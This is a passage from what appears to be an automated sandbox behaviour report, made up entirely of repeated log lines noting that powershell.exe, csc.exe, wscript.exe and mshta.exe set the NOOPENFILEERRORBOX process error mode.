Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
